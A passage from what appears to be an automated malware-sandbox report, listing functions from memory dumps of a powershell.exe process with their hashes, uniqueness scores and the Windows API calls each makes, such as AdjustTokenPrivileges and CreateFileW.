                                                    • Opcode Fuzzy Hash: d06e91bf6a0be4b302c8a51bee5607c3d0ff1d1ba2c0f30d52051cf5a54f8884
                                                    • Instruction Fuzzy Hash: 99F09B2120D3C05FC707977494A89567FB15D8315831D44EFC482CF1A7C6495885D7A3
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0283081E, Relevance: .0, Instructions: 27COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2124992374.0000000002830000.00000040.00000040.sdmp, Offset: 02830000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 28f6cfb21f77a2941ad56c439ca84a337307eaf1952dcdd82cea6d9390c10037
                                                    • Instruction ID: f6803703cf728cc82d736fdd268e0ec1b8c6f2f0721062236fa7b73d32e4ee52
                                                    • Opcode Fuzzy Hash: 28f6cfb21f77a2941ad56c439ca84a337307eaf1952dcdd82cea6d9390c10037
                                                    • Instruction Fuzzy Hash: 6AE092766007008BDB50CF0BFC81452F794EB84A30B18C07FDC4D8BB00E235B508CAA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 020923F4, Relevance: .0, Instructions: 15COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2121163971.0000000002092000.00000040.00000001.sdmp, Offset: 02092000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 620801a981f4dbf0042a3a0efa8f06a52b05a3502b8dc3f3d8964215ea4df03c
                                                    • Instruction ID: b6ff9de480f644b80a34fe427d4bd94cf57eacf30ca96bfe0df0c3145291569a
                                                    • Opcode Fuzzy Hash: 620801a981f4dbf0042a3a0efa8f06a52b05a3502b8dc3f3d8964215ea4df03c
                                                    • Instruction Fuzzy Hash: DED05E79208B819FDB178A1CC1A4B9537D4AF66B08F4644F9EC40CB6A3C768E5D1E200
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 020923BC, Relevance: .0, Instructions: 14COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2121163971.0000000002092000.00000040.00000001.sdmp, Offset: 02092000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c2fbab54c153b546cff3b9adc7a06a4e8621810401e569197d8caca867a95b74
                                                    • Instruction ID: 1c79497305905dd44983ccfe1e2e08c445ac283629a563122d30408d2b9359bb
                                                    • Opcode Fuzzy Hash: c2fbab54c153b546cff3b9adc7a06a4e8621810401e569197d8caca867a95b74
                                                    • Instruction Fuzzy Hash: CED05E343007818FDB16CA1CC1D4F5973E4AF40704F0684E8BC018B266C3A4E880E600
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Non-executed Functions

                                                    Analysis Process: powershell.exe PID: 2852 Parent PID: 2336 powershell.exeCOMMON

                                                    Executed Functions

                                                    Function 01D3ACB7, Relevance: 1.6, APIs: 1, Instructions: 75COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 01D3AD37
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2121967498.0000000001D3A000.00000040.00000001.sdmp, Offset: 01D3A000, based on PE: false
                                                    Similarity
                                                    • API ID: AdjustPrivilegesToken
                                                    • String ID:
                                                    • API String ID: 2874748243-0
                                                    • Opcode ID: 09d5078743d30a9b3b20ae3d59208e8b204bc6efd4bbf66f7462aea4bde16cf9
                                                    • Instruction ID: f31de3e48c430d2d4a3569672a298361ad07da6c24b08f033dbd1d8249d5191b
                                                    • Opcode Fuzzy Hash: 09d5078743d30a9b3b20ae3d59208e8b204bc6efd4bbf66f7462aea4bde16cf9
                                                    • Instruction Fuzzy Hash: E821BF766097809FEB238F29DC44B92BFB4EF06210F08849AE9858F163D2719908DB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01D3ACEE, Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 01D3AD37
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2121967498.0000000001D3A000.00000040.00000001.sdmp, Offset: 01D3A000, based on PE: false
                                                    Similarity
                                                    • API ID: AdjustPrivilegesToken
                                                    • String ID:
                                                    • API String ID: 2874748243-0
                                                    • Opcode ID: 04380d5ca5589b32807b91098b6ab00a4d5d0b8569e1586c9815e7354a6afa6c
                                                    • Instruction ID: 2fc7c6c5936815bc922961ffd3624281fef0fe653b9f2855069fdc291db7b372
                                                    • Opcode Fuzzy Hash: 04380d5ca5589b32807b91098b6ab00a4d5d0b8569e1586c9815e7354a6afa6c
                                                    • Instruction Fuzzy Hash: 751151756007049FEB21CF59EC44B96FBE4EF44611F04C46ADD85CB662E371E414DB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01D3B2CC, Relevance: 1.6, APIs: 1, Instructions: 50nativeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 01D3B329
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2121967498.0000000001D3A000.00000040.00000001.sdmp, Offset: 01D3A000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationQuerySystem
                                                    • String ID:
                                                    • API String ID: 3562636166-0
                                                    • Opcode ID: bfe684d0c7f7c93a8809fada51d2d6b4b35081c34ba34ea1ae73990c568526f8
                                                    • Instruction ID: 61934ef40fd5020ec305d11532fbf2fc36ac244376e1c7f74f1759b87d199f28
                                                    • Opcode Fuzzy Hash: bfe684d0c7f7c93a8809fada51d2d6b4b35081c34ba34ea1ae73990c568526f8
                                                    • Instruction Fuzzy Hash: D711A071509384AFDB228F15DC45F62FFB4EF46220F09849BED844B663D275A818DB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01D3B2EE, Relevance: 1.5, APIs: 1, Instructions: 38nativeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 01D3B329
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2121967498.0000000001D3A000.00000040.00000001.sdmp, Offset: 01D3A000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationQuerySystem
                                                    • String ID:
                                                    • API String ID: 3562636166-0
                                                    • Opcode ID: 7eadaca6bc19195c4078cff4c7b8fefedf36bf9f02d6a9c92600541293d88cda
                                                    • Instruction ID: 88a5ab8a44b6208bb8593d9295afcf926996aaffedb5d80185b79aa62356293b
                                                    • Opcode Fuzzy Hash: 7eadaca6bc19195c4078cff4c7b8fefedf36bf9f02d6a9c92600541293d88cda
                                                    • Instruction Fuzzy Hash: 6901A932500704DFEB218F09D885B62FBA0EF48720F08C09BDD890B626D376E418DB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02770118, Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetConsoleTitleW.KERNEL32(?), ref: 027701D0
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2130366890.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleTitle
                                                    • String ID:
                                                    • API String ID: 3358957663-0
                                                    • Opcode ID: 257d3350a25b8ca4cd5f2d0733efef457959297ea4436939eae26ceb4dfcbcb5
                                                    • Instruction ID: 9a578ec33a591689b7ea1a0e5d9792a1cbd93901e567aaee97beb08f5a478901
                                                    • Opcode Fuzzy Hash: 257d3350a25b8ca4cd5f2d0733efef457959297ea4436939eae26ceb4dfcbcb5
                                                    • Instruction Fuzzy Hash: FD31396650E3C08FEB138B759C65692BFB4AF03210F0E84DBD884CF1A3D6699809D762
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0277067A, Relevance: 1.6, APIs: 1, Instructions: 93fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 0277072D
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2130366890.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    • Opcode ID: 57b31b72bdbe515a903d479d5a584bbdd8da4a8a976df7c4bce32fbf22526577
                                                    • Instruction ID: 7e8f1c0feed026f825f384a64bc4c5829aed8f218840257c20140c90eaf498f5
                                                    • Opcode Fuzzy Hash: 57b31b72bdbe515a903d479d5a584bbdd8da4a8a976df7c4bce32fbf22526577
                                                    • Instruction Fuzzy Hash: 56316371509380AFEB22CF65CC85F56BFF8EF05210F09859EE9858B292D375E908CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02770D32, Relevance: 1.6, APIs: 1, Instructions: 89registryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • RegisterEventSourceW.ADVAPI32(?), ref: 02770DD6
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2130366890.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                    Similarity
                                                    • API ID: EventRegisterSource
                                                    • String ID:
                                                    • API String ID: 1693822063-0
                                                    • Opcode ID: 56879a079f116e25f3c7ea9c43e2dd9d96dea9d1357da0418026526ac618f0a8
                                                    • Instruction ID: a8241021d09cdc1ffebf1b84ce4bc212b010804d79962228eb2cd3079e222ba6
                                                    • Opcode Fuzzy Hash: 56879a079f116e25f3c7ea9c43e2dd9d96dea9d1357da0418026526ac618f0a8
                                                    • Instruction Fuzzy Hash: 6E319871509380AFE712CB25DC45B96BFE8DF06214F0884AAE984CF293D375A909C772
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01D3BD1E, Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetTokenInformation.KERNELBASE(?,00000E9C,715BA33F,00000000,00000000,00000000,00000000), ref: 01D3BDBC
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2121967498.0000000001D3A000.00000040.00000001.sdmp, Offset: 01D3A000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationToken
                                                    • String ID:
                                                    • API String ID: 4114910276-0
                                                    • Opcode ID: b8d89699d5c793cb26cc281824594746abd88584255adabfd2a877681cc47559
                                                    • Instruction ID: ecb5fc1dac40e6dee6f9cbd93fceb330471e75451d876fd6c5a1909bcadd5c2b
                                                    • Opcode Fuzzy Hash: b8d89699d5c793cb26cc281824594746abd88584255adabfd2a877681cc47559
                                                    • Instruction Fuzzy Hash: 7B319372509380AFE722CB65DC55F96BFB8EF06210F0885DBF985DB193D225A908C7B1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01D3AF24, Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • K32EnumProcessModules.KERNEL32(?,00000E9C,715BA33F,00000000,00000000,00000000,00000000), ref: 01D3AFBE
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2121967498.0000000001D3A000.00000040.00000001.sdmp, Offset: 01D3A000, based on PE: false
                                                    Similarity
                                                    • API ID: EnumModulesProcess
                                                    • String ID:
                                                    • API String ID: 1082081703-0
                                                    • Opcode ID: 5b813679af5779715c260be9f08c2f8b23ac7e3f32a0101addda6ce33e4b52f6
                                                    • Instruction ID: b45c321bc3d8f9aeea66a1a3c6dfa14545d7660619474fa1a48a5ab41b3e66e6
                                                    • Opcode Fuzzy Hash: 5b813679af5779715c260be9f08c2f8b23ac7e3f32a0101addda6ce33e4b52f6
                                                    • Instruction Fuzzy Hash: 7621E4B2509380AFE712CF24DC45B96BFB8EF06320F0884DBE984DB193D265A949C771
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02770FEE, Relevance: 1.6, APIs: 1, Instructions: 84COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetVolumeInformationW.KERNELBASE(?,00000E9C,?,?), ref: 0277109E
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2130366890.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationVolume
                                                    • String ID:
                                                    • API String ID: 2039140958-0
                                                    • Opcode ID: 8d87121d7d7036e707be6e25398568d745a97c2a11c46628d045f113c2c81a2d
                                                    • Instruction ID: 2e4aa096d278a60716a950f86f3c5d70e410afa78e1927e3313613854bf13895
                                                    • Opcode Fuzzy Hash: 8d87121d7d7036e707be6e25398568d745a97c2a11c46628d045f113c2c81a2d
                                                    • Instruction Fuzzy Hash: 8B31717550E3C06FD3138B358C55B66BFB4AF43610F1A81DBD884CF2A3D629A909C7A2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01D3B01D, Relevance: 1.6, APIs: 1, Instructions: 82COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • K32GetModuleInformation.KERNEL32(?,00000E9C,715BA33F,00000000,00000000,00000000,00000000), ref: 01D3B0AE
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2121967498.0000000001D3A000.00000040.00000001.sdmp, Offset: 01D3A000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationModule
                                                    • String ID:
                                                    • API String ID: 3425974696-0
                                                    • Opcode ID: 951e720db2e329173d35d68eade86353828ac7835c90efe871939e319596383e
                                                    • Instruction ID: 9ae9c3a85ae59d25eba6cc61cff84ee176b6a981b5878c295f27c66e0207db30
                                                    • Opcode Fuzzy Hash: 951e720db2e329173d35d68eade86353828ac7835c90efe871939e319596383e
                                                    • Instruction Fuzzy Hash: 4821A371509380AFE722CF15CC45FA6FFB8EF46220F08849BE945DB152D664E908CB71
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01D3A1A8, Relevance: 1.6, APIs: 1, Instructions: 79COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetConsoleCtrlHandler.KERNEL32(?,00000E9C,?,?), ref: 01D3A23E
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2121967498.0000000001D3A000.00000040.00000001.sdmp, Offset: 01D3A000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleCtrlHandler
                                                    • String ID:
                                                    • API String ID: 1513847179-0
                                                    • Opcode ID: c9cbd823d60a4ea735de190a6b5c0006313d7a23a8a15c38882a7333e4772468
                                                    • Instruction ID: f5c306b6336ec0caf8140055e8ff146479129e1e10386a808090c61a2c981c89
                                                    • Opcode Fuzzy Hash: c9cbd823d60a4ea735de190a6b5c0006313d7a23a8a15c38882a7333e4772468
                                                    • Instruction Fuzzy Hash: F721A37150D3C06FD312CB368C55B66BFB4EF43620F0981DBD8848F693D229A919CBA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02770784, Relevance: 1.6, APIs: 1, Instructions: 78COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetFileType.KERNELBASE(?,00000E9C,715BA33F,00000000,00000000,00000000,00000000), ref: 02770819
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2130366890.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                    Similarity
                                                    • API ID: FileType
                                                    • String ID:
                                                    • API String ID: 3081899298-0
                                                    • Opcode ID: 775d2f9f6b42398576c0a4a8340424233060c351632592c2ff5436f6cf9e589e
                                                    • Instruction ID: bd2315e565c669a2d4cb8a725201f6885650cce448cc88fe0fa5d0c04fecbace
                                                    • Opcode Fuzzy Hash: 775d2f9f6b42398576c0a4a8340424233060c351632592c2ff5436f6cf9e589e
                                                    • Instruction Fuzzy Hash: 0C21DDB5509780AFE712CB159C45FA3BFA8EF46720F0981DBF9848F153D2646905C771
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02770464, Relevance: 1.6, APIs: 1, Instructions: 77COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SHGetFolderPathW.SHELL32(?,00000E9C,?,?), ref: 02770502
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2130366890.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                    Similarity
                                                    • API ID: FolderPath
                                                    • String ID:
                                                    • API String ID: 1514166925-0
                                                    • Opcode ID: c46d46292937e016d225f58e4469ceba615c09d2b0d9d0e24e073dff48eea538
                                                    • Instruction ID: a21bfbc7c84a9437e353bc1a166da388b2351be252c95e6a9ce8f46ef19e7604
                                                    • Opcode Fuzzy Hash: c46d46292937e016d225f58e4469ceba615c09d2b0d9d0e24e073dff48eea538
                                                    • Instruction Fuzzy Hash: 49217F7550E3C0AFD3128B358C55B62BFB4EF47610F1A81CBD8848F693D225A919C7B2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 027706AE, Relevance: 1.6, APIs: 1, Instructions: 76fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 0277072D
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2130366890.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    • Opcode ID: 9853ebae174df2938f5124a5d29f080a2c16b86434cd3f9c9f1a6d8b3f0b3b32
                                                    • Instruction ID: 3d6ccb2ea49745cdf387ba112a985011cac4d0e79b5adabda7e504d8ad3dd9f3
                                                    • Opcode Fuzzy Hash: 9853ebae174df2938f5124a5d29f080a2c16b86434cd3f9c9f1a6d8b3f0b3b32
                                                    • Instruction Fuzzy Hash: 1F219071500704EFEB21DF65CC85F66FBE8EF08650F04846AE9899B291D771E904CB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02770854, Relevance: 1.6, APIs: 1, Instructions: 75fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ReadFile.KERNELBASE(?,00000E9C,715BA33F,00000000,00000000,00000000,00000000), ref: 027708E5
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2130366890.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                    Similarity
                                                    • API ID: FileRead
                                                    • String ID:
                                                    • API String ID: 2738559852-0
                                                    • Opcode ID: fc2930bdd23f3c9e4efd42cee283110739df891008b2e72970aaab4eedf6c671
                                                    • Instruction ID: 81965983c063e58c27f11826c5c5d076a2248981fae924ee8918356b51ee3dae
                                                    • Opcode Fuzzy Hash: fc2930bdd23f3c9e4efd42cee283110739df891008b2e72970aaab4eedf6c671
                                                    • Instruction Fuzzy Hash: 87219271409380AFE722CF61DC45F96BFB8EF06314F09859BE9849B153C265A909CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01D3A8B4, Relevance: 1.6, APIs: 1, Instructions: 74threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetThreadPreferredUILanguages.KERNEL32(?,00000E9C,?,?), ref: 01D3A94A
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2121967498.0000000001D3A000.00000040.00000001.sdmp, Offset: 01D3A000, based on PE: false
                                                    Similarity
                                                    • API ID: LanguagesPreferredThread
                                                    • String ID:
                                                    • API String ID: 842807343-0
                                                    • Opcode ID: 26f1123bb1f8b2ed9d8c11ee13028d95f02fec772df4560db71adffa6b7e60d5
                                                    • Instruction ID: e976502e97ce17beb29431678e9025ddda1c5bbb4aa10489e91e460906bd47a9
                                                    • Opcode Fuzzy Hash: 26f1123bb1f8b2ed9d8c11ee13028d95f02fec772df4560db71adffa6b7e60d5
                                                    • Instruction Fuzzy Hash: 2121957550D780AFD3138B259C51B62BFB4EF87A10F0981DBE8848B653D225A919C7B2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02770D66, Relevance: 1.6, APIs: 1, Instructions: 71registryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • RegisterEventSourceW.ADVAPI32(?), ref: 02770DD6
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2130366890.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                    Similarity
                                                    • API ID: EventRegisterSource
                                                    • String ID:
                                                    • API String ID: 1693822063-0
                                                    • Opcode ID: 6e5a0378667d867bbdc4f7854e856d3107df81ccdf1776ef153c70b1af9ee25d
                                                    • Instruction ID: 7e1a0a35ad0acdeb50ec0f24edc4a3abf652410036d55b6d2b0b45a8f9e21ecb
                                                    • Opcode Fuzzy Hash: 6e5a0378667d867bbdc4f7854e856d3107df81ccdf1776ef153c70b1af9ee25d
                                                    • Instruction Fuzzy Hash: C3216D71604340AFEB21DF66DC85BA6FBD8EF05614F04846AE948DB282E775E904CA62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01D3BD52, Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetTokenInformation.KERNELBASE(?,00000E9C,715BA33F,00000000,00000000,00000000,00000000), ref: 01D3BDBC
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2121967498.0000000001D3A000.00000040.00000001.sdmp, Offset: 01D3A000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationToken
                                                    • String ID:
                                                    • API String ID: 4114910276-0
                                                    • Opcode ID: fa2bef6754972b3938567008551fc1c269c1d38e14d0cead1d4e399c869c1009
                                                    • Instruction ID: 42a6c69fd43674a3157363908fbe9a3c67bc5178e874bde8f78ef4ee432bc80d
                                                    • Opcode Fuzzy Hash: fa2bef6754972b3938567008551fc1c269c1d38e14d0cead1d4e399c869c1009
                                                    • Instruction Fuzzy Hash: DB119D72500304EFEB21CF55DC85FAAFBA8EF44720F04856AF9459A141D675A9048BB1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01D3B04A, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • K32GetModuleInformation.KERNEL32(?,00000E9C,715BA33F,00000000,00000000,00000000,00000000), ref: 01D3B0AE
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2121967498.0000000001D3A000.00000040.00000001.sdmp, Offset: 01D3A000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationModule
                                                    • String ID:
                                                    • API String ID: 3425974696-0
                                                    • Opcode ID: 0e5f4727bbeddb9f585740f031ccd72e95d950a59493f387f479ef256f52867d
                                                    • Instruction ID: b7d42d3a0b546136faf57da75d87f8bc6af911bde52ec39b43a80a5688934cf8
                                                    • Opcode Fuzzy Hash: 0e5f4727bbeddb9f585740f031ccd72e95d950a59493f387f479ef256f52867d
                                                    • Instruction Fuzzy Hash: AE118171600700EFEB21CF19DC85FA6FBE8EF45660F14846BED45DB251D674E9048A71
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0277137E, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2130366890.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleWrite
                                                    • String ID:
                                                    • API String ID: 2657657451-0
                                                    • Opcode ID: 32829bae54e91483c18ce4bbec2168247d8312e0dadd7e4cd07fc9a40cba1b74
                                                    • Instruction ID: d73c125eb7ec4f36a87c6f56f90c7886fe23075a68a8e4198feab73b81e3dceb
                                                    • Opcode Fuzzy Hash: 32829bae54e91483c18ce4bbec2168247d8312e0dadd7e4cd07fc9a40cba1b74
                                                    • Instruction Fuzzy Hash: FB2192725083809FDB21CF25DC45B96FFF4EF06220F0884AAED858B562D335A448DB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02770F34, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetDriveTypeW.KERNELBASE(?), ref: 02770FB0
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2130366890.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                    Similarity
                                                    • API ID: DriveType
                                                    • String ID:
                                                    • API String ID: 338552980-0
                                                    • Opcode ID: e00083d19636612852b54ed660a86e0fc317c63d6339d0e24d9985163cde65aa
                                                    • Instruction ID: 6902d3505fd3b911bb4020f1d898dacc6e33003773e48d6d44897fdad47eddf0
                                                    • Opcode Fuzzy Hash: e00083d19636612852b54ed660a86e0fc317c63d6339d0e24d9985163cde65aa
                                                    • Instruction Fuzzy Hash: E6215B7150D3C09FDB12CB25DC55B92BFB4AF03224F0D84DAE888CF293D2699808CB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01D3BABE, Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetConsoleScreenBufferInfo.KERNEL32 ref: 01D3BB2F
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2121967498.0000000001D3A000.00000040.00000001.sdmp, Offset: 01D3A000, based on PE: false
                                                    Similarity
                                                    • API ID: BufferConsoleInfoScreen
                                                    • String ID:
                                                    • API String ID: 3437242342-0
                                                    • Opcode ID: 3282c84986122182d8ffa8cd70a57478a69e5985c91f14d75aebfd823b9e3152
                                                    • Instruction ID: 8bfe2c6c77d5420155b51be5f4be1e69684b3f3163fba95bac1f67b42c610099
                                                    • Opcode Fuzzy Hash: 3282c84986122182d8ffa8cd70a57478a69e5985c91f14d75aebfd823b9e3152
                                                    • Instruction Fuzzy Hash: C421A1725093C09FEB128F25DC55B92BFE4EF07220F0984DBDD858F263D264A908DB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01D3AAAB, Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 01D3AB1A
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2121967498.0000000001D3A000.00000040.00000001.sdmp, Offset: 01D3A000, based on PE: false
                                                    Similarity
                                                    • API ID: LookupPrivilegeValue
                                                    • String ID:
                                                    • API String ID: 3899507212-0
                                                    • Opcode ID: 4996e64c2df2dc26630b1c2663566ad8421b19f264a2f6d4de5f2e36cf859038
                                                    • Instruction ID: 75b838a7fcaf5954d154806c50cd46727d267e6664ae13793c92922529eb6cb1
                                                    • Opcode Fuzzy Hash: 4996e64c2df2dc26630b1c2663566ad8421b19f264a2f6d4de5f2e36cf859038
                                                    • Instruction Fuzzy Hash: 8B2142726053809FE722CF29DC45B52BFE8EF56610F0884AAED89DB252D265E408CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 027710D4, Relevance: 1.6, APIs: 1, Instructions: 65threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetThreadUILanguage.KERNEL32(?), ref: 02771148
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2130366890.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                    Similarity
                                                    • API ID: LanguageThread
                                                    • String ID:
                                                    • API String ID: 243849632-0
                                                    • Opcode ID: 7cdb0fe34e03d6abab72ef94dcec4da487705ae0f82534f490a304a95bf14d3b
                                                    • Instruction ID: ee127725d569c5c63b93ad4780ba6a967ac9d81149239e9e3e96b8619dfecc9b
                                                    • Opcode Fuzzy Hash: 7cdb0fe34e03d6abab72ef94dcec4da487705ae0f82534f490a304a95bf14d3b
                                                    • Instruction Fuzzy Hash: 11216D6140E3C49FD7138B259C54A62BFB4EF57620F0980DBDCC48F2A3D2695808D772
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01D3AF62, Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • K32EnumProcessModules.KERNEL32(?,00000E9C,715BA33F,00000000,00000000,00000000,00000000), ref: 01D3AFBE
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2121967498.0000000001D3A000.00000040.00000001.sdmp, Offset: 01D3A000, based on PE: false
                                                    Similarity
                                                    • API ID: EnumModulesProcess
                                                    • String ID:
                                                    • API String ID: 1082081703-0
                                                    • Opcode ID: 08aeec4c4d7cd053c42652ffe315d570b20b63b6c178079d85405ef5eab70549
                                                    • Instruction ID: e4f3bc4b77b313028f07da743570fd980c16c7baceb67be8cb2b59ddd3f54390
                                                    • Opcode Fuzzy Hash: 08aeec4c4d7cd053c42652ffe315d570b20b63b6c178079d85405ef5eab70549
                                                    • Instruction Fuzzy Hash: 6611C472500300EFEB21DF55DC45BA6FBA8EF44720F14856AFD85DB181D675A9048BB1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01D3BA10, Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 01D3BA7E
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2121967498.0000000001D3A000.00000040.00000001.sdmp, Offset: 01D3A000, based on PE: false
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    • Opcode ID: 838382800a2d7c6194f85b137cbc991fc875d15cd4798da00d0019a4e35b30bf
